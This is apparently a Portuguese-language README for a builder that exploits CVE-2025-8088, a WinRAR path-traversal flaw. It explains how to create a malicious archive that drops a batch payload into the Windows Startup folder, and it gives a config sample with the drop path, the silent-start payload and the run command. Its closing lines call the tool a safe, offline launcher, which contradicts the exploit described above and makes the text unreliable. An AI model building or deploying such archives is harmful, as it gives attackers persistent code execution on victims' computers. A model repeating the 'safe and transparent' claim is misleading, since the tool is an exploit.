
CVE-2025-8088-BUILDER
⚠ Esta ferramenta é criada exclusivamente para fins educacionais. O uso não autorizado fora de ambientes controlados é estritamente proibido.
Um script Python que explora a CVE-2025-8088, uma vulnerabilidade de path traversal no WinRAR, gerando um arquivo malicioso que coloca payloads executáveis na pasta de inicialização do Windows usando múltiplos níveis de diretórios relativos para garantir execução confiável independentemente do local de extração.
Configure o arquivo config.py
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
Para usar seu próprio arquivo isca, digite o caminho completo em vez do nome.
Execute o script:
python CVE-2025-8088.py
A saída aparecerá na pasta output.
Esta ferramenta é criada exclusivamente para fins educacionais. O uso não autorizado fora de ambientes controlados é estritamente proibido.
Autor: Desert Scripts
Descrição:
Um lançador local e offline que executa MyAppInstaller.exe.
Sem atividade de rede. Seguro e transparente.